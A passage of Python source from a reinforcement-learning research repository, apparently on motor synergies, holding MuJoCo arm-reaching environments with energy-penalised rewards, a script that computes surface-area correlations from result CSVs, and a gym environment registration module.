'penalty_wrist': self.wrist_cost_weight * reward_wristrot,
'ori_reward': reward
}
return ob, reward, done, info
def viewer_setup(self):
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 2.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0
self.viewer.cam.lookat[2] += 0.5
self.viewer.cam.elevation = -20 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
def reset_model(self):
self.t = 0
#self.init_qpos[1] = -3.142 / 2
self.init_qpos[3] = -3.142 / 2
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:6]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[6:],
self.sim.data.qvel.flat[:6],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[1] - self.target_pos[1]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
])
class RealArm5dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self, xml_file='real_arm5dof.xml',distance_reward_weight=5,
shoulder_cost_weight=0,wrist_cost_weight=0,MinE_cost_weight=0,pcx=0.05,pcy=0):
# utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['s_abduction', 's_flexion', 's_rotation', 'e_flexion',
'w_flexion']
self.pcx = pcx
self.pcy = pcy
self.real_time = 0.01
self.frame_skip = 2 # 2
self.f=0.4
self.t = 0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight = distance_reward_weight
self.shoulder_cost_weight = shoulder_cost_weight
self.wrist_cost_weight = wrist_cost_weight
self.MinE_cost_weight =MinE_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
def step(self, a):
#a=0
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip") - self.target_pos
total_torque = a
reward_dist = - np.linalg.norm(vec)
#reward_ctrl = - np.square(total_torque).sum()
reward_shoulder = - np.square(total_torque[0:3]).sum()
reward_wristrot = - np.square(total_torque[4]).sum()
#meanEff=np.abs(total_torque).sum()/len(self.joint_list)
#penalty_MinE=-(np.abs(total_torque)-meanEff).sum()
penalty_MinE=- np.sum(np.square(total_torque))#self.control_cost(action)
# penalty_MinE = 0
# for i in range(len(self.joint_list)):
# delta_theta = np.abs( self.sim.data.qvel.flat[i])
# # energy = energy + np.abs(action[i]) * delta_theta
# penalty_MinE = penalty_MinE + np.abs(total_torque[i]) * delta_theta
# penalty_MinE= -penalty_MinE
reward = self.distance_reward_weight * reward_dist\
+ self.shoulder_cost_weight*reward_shoulder\
+ self.wrist_cost_weight*reward_wristrot
ori_reward=reward
reward = ori_reward+self.MinE_cost_weight *penalty_MinE
self.do_simulation(total_torque, self.frame_skip)
self.t += self.frame_skip * self.real_time
#self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [(p1x - p2x) * np.sin(self.t * np.pi*2*self.f) / 2 + (p1x + p2x) / 2, 0,(p1y - p2y) * np.sin(self.t * np.pi*2*self.f) / 2 + (p1y + p2y) / 2] # ,phi=1
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + \
[self.pcx + (-0.22 * np.sin(self.t * np.pi * 2 * self.f)),self.pcy
+ (-0.18 * np.cos(self.t * np.pi * 2 * self.f)),0.1]
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight * reward_dist,
'penalty_shoulder': self.shoulder_cost_weight * reward_shoulder,
'penalty_wrist': self.wrist_cost_weight * reward_wristrot,
'penalty_MinE': self.MinE_cost_weight *penalty_MinE,
'ori_reward': ori_reward
}
return ob, reward, done, info
def viewer_setup(self):
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 2.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0
self.viewer.cam.lookat[2] += 0.5
self.viewer.cam.elevation = -20 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
def reset_model(self):
self.t = 0
#self.init_qpos[1] = -3.142 / 2
self.init_qpos[3] = -3.142 / 2
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:5]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[5:],
self.sim.data.qvel.flat[:5],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[1] - self.target_pos[1]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
])
class RealArm4dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self, xml_file='real_arm4dof.xml',distance_reward_weight=5,
shoulder_cost_weight=0,wrist_cost_weight=0,MinE_cost_weight=0,pcx=0.05,pcy=0):
# utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['s_abduction', 's_flexion', 's_rotation', 'e_flexion']
self.pcx = pcx
self.pcy = pcy
self.real_time = 0.01
self.frame_skip = 2 # 2
self.f=0.4
self.t = 0
self.target_pos = np.asarray([0, 0, 0])
self.shoulder_cost_weight=shoulder_cost_weight
self.distance_reward_weight=distance_reward_weight
self.MinE_cost_weight =MinE_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
def step(self, a):
#a=0
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip") - self.target_pos
total_torque = a
reward_dist = - np.linalg.norm(vec)
#reward_ctrl = - np.square(total_torque).sum()
reward_shoulder = - np.square(total_torque[0:3]).sum()
#reward_wristrot = - np.square(total_torque[4::]).sum()
#meanEff=np.abs(total_torque).sum()/len(self.joint_list)
#penalty_MinE=-(np.abs(total_torque)-meanEff).sum()
penalty_MinE=- np.sum(np.square(total_torque))#self.control_cost(action)
# penalty_MinE = 0
# for i in range(len(self.joint_list)):
# delta_theta = np.abs( self.sim.data.qvel.flat[i])
# # energy = energy + np.abs(action[i]) * delta_theta
# penalty_MinE = penalty_MinE + np.abs(total_torque[i]) * delta_theta
# penalty_MinE= -penalty_MinE
reward = self.distance_reward_weight * reward_dist\
+ self.shoulder_cost_weight*reward_shoulder
#+ self.wrist_cost_weight*reward_wristrot
ori_reward=reward
reward = ori_reward+self.MinE_cost_weight *penalty_MinE
self.do_simulation(total_torque, self.frame_skip)
self.t += self.frame_skip * self.real_time
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + \
[self.pcx + (-0.22 * np.sin(self.t * np.pi * 2 * self.f)),self.pcy
+ (-0.18 * np.cos(self.t * np.pi * 2 * self.f)),0.1]
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight * reward_dist,
'penalty_shoulder': self.shoulder_cost_weight * reward_shoulder,
'penalty_MinE': self.MinE_cost_weight * penalty_MinE,
'ori_reward': ori_reward
}
return ob, reward, done,info
def viewer_setup(self):
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 2.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0
self.viewer.cam.lookat[2] += 0.5
self.viewer.cam.elevation = -20 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
def reset_model(self):
self.t = 0
#self.init_qpos[1] = -3.142 / 2
self.init_qpos[3] = -3.142 / 2
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:4]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[4:],
self.sim.data.qvel.flat[:4],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[1] - self.target_pos[1]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
])
class RealArm3dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self, xml_file='real_arm3dof.xml',distance_reward_weight=5,
shoulder_cost_weight=0,wrist_cost_weight=0,pcx=0.05,pcy=0):
# utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = [ 's_flexion', 's_rotation', 'e_flexion']
self.pcx = pcx
self.pcy = pcy
self.real_time = 0.01
self.frame_skip = 2 # 2
self.f=0.4
self.t = 0
self.target_pos = np.asarray([0, 0, 0])
self.shoulder_cost_weight=shoulder_cost_weight
self.distance_reward_weight=distance_reward_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
def step(self, a):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip") - self.target_pos
total_torque = a
reward_dist = - np.linalg.norm(vec)
#reward_ctrl = - np.square(total_torque).sum()
reward_shoulder = - np.square(total_torque[0:2]).sum()
#reward_wristrot = - np.square(total_torque[4::]).sum()
reward = self.distance_reward_weight * reward_dist\
+ self.shoulder_cost_weight*reward_shoulder\
#+ self.wrist_cost_weight*reward_wristrot
self.do_simulation(total_torque, self.frame_skip)
self.t += self.frame_skip * self.real_time
#self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [(p1x - p2x) * np.sin(self.t * np.pi*2*self.f) / 2 + (p1x + p2x) / 2, 0,(p1y - p2y) * np.sin(self.t * np.pi*2*self.f) / 2 + (p1y + p2y) / 2] # ,phi=1
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + \
[self.pcx + (-0.22 * np.sin(self.t * np.pi * 2 * self.f)),self.pcy
+ (-0.18 * np.cos(self.t * np.pi * 2 * self.f)),0.1]
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight * reward_dist,
'penalty_shoulder': self.shoulder_cost_weight * reward_shoulder,
'ori_reward': reward
}
return ob, reward, done, info
def viewer_setup(self):
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 2.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0
self.viewer.cam.lookat[2] += 0.5
self.viewer.cam.elevation = -20 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
def reset_model(self):
self.t = 0
#self.init_qpos[1] = -3.142 / 2
self.init_qpos[2] = -3.142 / 2
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:3]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[3:],
self.sim.data.qvel.flat[:3],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[1] - self.target_pos[1]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
])
``` |
{
"source": "JiazhengChai/synergy_DRL",
"score": 2
} |
#### File: examples/plotting/AdaptiveW_process_SA.py
```python
from sklearn.preprocessing import StandardScaler
import numpy as np
from sklearn.metrics import r2_score
from matplotlib import pyplot as plt
import os
from matplotlib.lines import Line2D
from exp_variant_class import exp_variant#,PCA
from sklearn.decomposition import PCA
import argparse
from scipy import integrate
import csv
from scipy.stats.stats import pearsonr
import pandas as pd
def gauss(x, mu, a = 1, sigma = 1/6):
return a * np.exp(-(x - mu)**2 / (2*sigma**2))
def R2():
return r'R^{{{e:d}}}'.format(e=int(2))
cmap = plt.cm.viridis
cmaplist = [cmap(i) for i in range(cmap.N)]
cmaplen=len(cmaplist)
color_list=['b','r','g','c','m','y','k','#e41a1c', '#377eb8', '#4daf4a', '#984ea3', '#ff7f00', '#ffff33', '#a65628', '#f781bf']
plt.rcParams["figure.figsize"] = (10,8)
parser = argparse.ArgumentParser()
parser.add_argument('--agentt',
type=str,choices=['HCheavy','HC','A','Antheavy','FC','Ctp','G','HC_E1'])
args = parser.parse_args()
tif=False
sortt=False
standscale=True
temporal=True
manual_pca=False
recon_num=8
ori_total_vec_rsq=9
truncated_start=200
dll=50
std=True
agentt=args.agentt
precheck=False
if 'HC' in agentt:
total_vec = 6
total_chk=30
ori_final = 3000
ori_begin = 100
ori_step = 100
x_speed_index=8
desired_dist=500
if 'E1' in agentt:
agentt_folder='HC_E1'
elif 'heavy' in agentt:
agentt_folder = 'HCheavy'
else:
agentt_folder = 'HC'
elif 'FC' in agentt:
total_vec = 12
total_chk=30
ori_final = 3000
ori_begin = 100
ori_step = 100
x_speed_index=14
desired_dist=500
agentt_folder='FC'
top_folder=agentt
file_path=os.path.abspath(os.getcwd())
path_list=file_path.split('/')
while path_list[-1] !="synergyDRL":
path_list.pop(-1)
cwd="/".join(path_list)
path_to_folder=cwd+'/experiments_results/Synergy/all_csv/raw_csv'
final = ori_final
begin = ori_begin
step = ori_step
path_to_csv=path_to_folder+'/'+agentt_folder
output_folder=cwd+'/experiments_results/Synergy/all_csv/process_SA_intermediate/'+agentt
if not os.path.exists(output_folder):
os.makedirs(output_folder, exist_ok=True)
process_csv = open(output_folder+ '/' + agentt +'_process_all_surface.csv', 'w')
writer = csv.writer(process_csv, lineterminator='\n')
writer.writerow(['Trials', 'Corr SA_P', 'Corr SA_PI', 'Corr SA_E','FSA', 'DSA', 'ASA','FP', 'FPI', 'FE'])
TD3_data=[]
for csv_ in os.listdir(path_to_csv):
current_csv = pd.read_csv(path_to_csv + '/' + csv_)
current_name_list=csv_.split('_')
current_name_list=current_name_list[0:-2]
name=''
for cn in current_name_list:
name=name+cn+'_'
name=name[0:-1]
P_list = current_csv['P']
PI_list = current_csv['PI']
E_list = current_csv['E']
SA_list = current_csv['Surface Area']
Checkpoint_list = current_csv['Checkpoint']
P_list = np.asarray(P_list)
PI_list = np.asarray(PI_list)
E_list = np.asarray(E_list)
SA_list = np.asarray(SA_list)
Checkpoint_list = np.asarray(Checkpoint_list)
corr_SA_P = np.corrcoef(SA_list, P_list)[0, 1]
corr_SA_PI = np.corrcoef(SA_list, PI_list)[0, 1]
corr_SA_E = np.corrcoef(SA_list, E_list)[0, 1]
FP = P_list[0]
FPI = PI_list[0]
FE = E_list[0]
FSA = SA_list[0]
DSA = SA_list[0] - SA_list[-1]
SA_list2 = np.copy(SA_list)
ASA = 0
neg_ASA = 0
for sa in SA_list:
for sa2 in SA_list2:
diff = sa - sa2
if diff >= 0 and diff > ASA:
ASA = diff
elif diff < 0:
if diff < neg_ASA:
neg_ASA = diff
if np.abs(neg_ASA) > ASA:
ASA = neg_ASA
if 'TD3' not in name:
writer.writerow([name,corr_SA_P,corr_SA_PI,corr_SA_E,FSA,DSA,ASA,FP,FPI,FE])
else:
TD3_data.append([name,corr_SA_P,corr_SA_PI,corr_SA_E,FSA,DSA,ASA,FP,FPI,FE])
for row in TD3_data:
writer.writerow(row)
process_csv.close()
```
#### File: environments/gym/__init__.py
```python
import gym
CUSTOM_GYM_ENVIRONMENTS_PATH = __package__
MUJOCO_ENVIRONMENTS_PATH = f'{CUSTOM_GYM_ENVIRONMENTS_PATH}.mujoco'
MUJOCO_ENVIRONMENT_SPECS = (
{
'id': 'VMPDv2-E0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_mvt_pendulum_v2:VerticalMvtPendulumEnvDV2'),
},
{
'id': 'VMPD-E0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_mvt_pendulum:VerticalMvtPendulumDEnv'),
},
{
'id': 'VMPv2-E0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_mvt_pendulum_v2:VerticalMvtPendulumEnvV2'),
},
{
'id': 'VMP-E0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_mvt_pendulum:VerticalMvtPendulumEnv'),
},
{
'id': 'Swimmer-Parameterizable-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.swimmer:SwimmerEnv'),
},
{
'id': 'Swimmer-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.swimmer:SwimmerEnv'),
},
{
'id': 'Hopper-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.hopper:HopperEnv'),
},
{
'id': 'Hopper-EnergyPoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.hopper:HopperEnv'),
},
{
'id': 'Hopper-EnergyOne-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.hopper:HopperEnv'),
},
{
'id': 'Hopper-EnergyOnePoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.hopper:HopperEnv'),
},
{
'id': 'Hopper-EnergyTwo-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.hopper:HopperEnv'),
},
{
'id': 'Bipedal2d-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.bipedal_2:Bipedal2Env'),
},
{
'id': 'Walker2d-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.walker2d:Walker2dEnv'),
},
{
'id': 'Walker2d-EnergyPoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.walker2d:Walker2dEnv'),
},
{
'id': 'Walker2d-EnergyOne-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.walker2d:Walker2dEnv'),
},
{
'id': 'Walker2d-EnergyOnePoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.walker2d:Walker2dEnv'),
},
{
'id': 'Walker2d-EnergyTwo-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.walker2d:Walker2dEnv'),
},
{
'id': 'Walker2d-EnergyFour-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.walker2d:Walker2dEnv'),
},
{
'id': 'Walker2d-EnergySix-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.walker2d:Walker2dEnv'),
},
{
'id': 'HalfCheetah-EnergySix-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah-EnergyFour-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah-EnergyTwo-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah-EnergyOnePoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah-EnergyOne-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah-EnergyPoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah-EnergyPoint1-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah5dof-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv_5dof'),
},
{
'id': 'HalfCheetah4dof-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv_4dof'),
},
{
'id': 'HalfCheetah3doff-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv_3doff'),
},
{
'id': 'HalfCheetah3dofb-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv_3dofb'),
},
{
'id': 'HalfCheetah2dof-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv_2dof'),
},
{
'id': 'Giraffe-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.giraffe:GiraffeEnv'),
},
{
'id': 'HalfCheetahHeavy-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahHeavyEnv'),
},
{
'id': 'VA-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_arm:VA'),
},
{
'id': 'VA4dof-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_arm:VA4dof'),
},
{
'id': 'VA6dof-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_arm:VA6dof'),
},
{
'id': 'VA8dof-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_arm:VA8dof'),
},
{
'id': 'Centripede-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.centripede:CentripedeEnv'),
},
{
'id': 'FullCheetah-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:FullCheetahEnv'),
},
{
'id': 'HalfCheetah-PerfIndex-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv2'),
},
{
'id': 'HalfCheetah-InvPerfIndex-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv3'),
},
{
'id': 'Ant-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.ant:AntEnv'),
},
{
'id': 'AntHeavy-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.ant:AntHeavyEnv'),
},
{
'id': 'Ant-EnergyPoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.ant:AntEnv'),
},
{
'id': 'Ant-EnergyOne-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.ant:AntEnv'),
},
{
'id': 'Ant-EnergyOnePoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.ant:AntEnv'),
},
{
'id': 'Ant-EnergyTwo-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.ant:AntEnv'),
},
{
'id': 'Humanoid-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid:HumanoidEnv'),
},
{
'id': 'Humanoid-EnergyOne-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid:HumanoidEnv'),
},
{
'id': 'Humanoid-EnergyPoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid:HumanoidEnv'),
},
{
'id': 'Humanoid-EnergyPoint1-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid:HumanoidEnv'),
},
{
'id': 'Humanoid-EnergyPz5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid:HumanoidEnv'),
},
{
'id': 'Humanoidrllab-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid_rllab:HumanoidEnv'),
},
{
'id': 'Humanoidrllab-EnergyOne-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid_rllab:HumanoidEnv'),
},
{
'id': 'Humanoidrllab-EnergyP5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid_rllab:HumanoidEnv'),
},
{
'id': 'Humanoidrllab-EnergyP1-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid_rllab:HumanoidEnv'),
},
{
'id': 'Humanoidrllab-EnergyPz5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid_rllab:HumanoidEnv'),
},
{
'id': 'Pusher2d-Default-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.pusher_2d:Pusher2dEnv'),
},
{
'id': 'Pusher2d-DefaultReach-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.pusher_2d:ForkReacherEnv'),
},
{
'id': 'Pusher2d-ImageDefault-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.image_pusher_2d:ImagePusher2dEnv'),
},
{
'id': 'Pusher2d-ImageReach-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.image_pusher_2d:ImageForkReacher2dEnv'),
},
{
'id': 'Pusher2d-BlindReach-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.image_pusher_2d:BlindForkReacher2dEnv'),
},
)
GENERAL_ENVIRONMENT_SPECS = (
{
'id': 'MultiGoal-Default-v0',
'entry_point': (f'{CUSTOM_GYM_ENVIRONMENTS_PATH}'
'.multi_goal:MultiGoalEnv')
},
)
MULTIWORLD_ENVIRONMENT_SPECS = (
{
'id': 'Point2DEnv-Default-v0',
'entry_point': 'multiworld.envs.pygame.point2d:Point2DWallEnv'
},
{
'id': 'Point2DEnv-Wall-v0',
'entry_point': 'multiworld.envs.pygame.point2d:Point2DWallEnv'
},
)
MUJOCO_ENVIRONMENTS = tuple(
environment_spec['id']
for environment_spec in MUJOCO_ENVIRONMENT_SPECS)
GENERAL_ENVIRONMENTS = tuple(
environment_spec['id']
for environment_spec in GENERAL_ENVIRONMENT_SPECS)
MULTIWORLD_ENVIRONMENTS = tuple(
environment_spec['id']
for environment_spec in MULTIWORLD_ENVIRONMENT_SPECS)
GYM_ENVIRONMENTS = (
*MUJOCO_ENVIRONMENTS,
*GENERAL_ENVIRONMENTS,
*MULTIWORLD_ENVIRONMENTS,
)
def register_mujoco_environments():
"""Register softlearning mujoco environments."""
for mujoco_environment in MUJOCO_ENVIRONMENT_SPECS:
gym.register(**mujoco_environment)
gym_ids = tuple(
environment_spec['id']
for environment_spec in MUJOCO_ENVIRONMENT_SPECS)
return gym_ids
def register_general_environments():
"""Register gym environments that don't fall under a specific category."""
for general_environment in GENERAL_ENVIRONMENT_SPECS:
gym.register(**general_environment)
gym_ids = tuple(
environment_spec['id']
for environment_spec in GENERAL_ENVIRONMENT_SPECS)
return gym_ids
def register_multiworld_environments():
"""Register custom environments from multiworld package."""
for multiworld_environment in MULTIWORLD_ENVIRONMENT_SPECS:
gym.register(**multiworld_environment)
gym_ids = tuple(
environment_spec['id']
for environment_spec in MULTIWORLD_ENVIRONMENT_SPECS)
return gym_ids
def register_environments():
registered_mujoco_environments = register_mujoco_environments()
registered_general_environments = register_general_environments()
registered_multiworld_environments = register_multiworld_environments()
return (
*registered_mujoco_environments,
*registered_general_environments,
*registered_multiworld_environments,
)
```
#### File: gym/mujoco/half_cheetah.py
```python
import numpy as np
from gym import utils
from gym.envs.mujoco import mujoco_env
import os
from . import path
DEFAULT_CAMERA_CONFIG = {
'distance': 4.0,
}
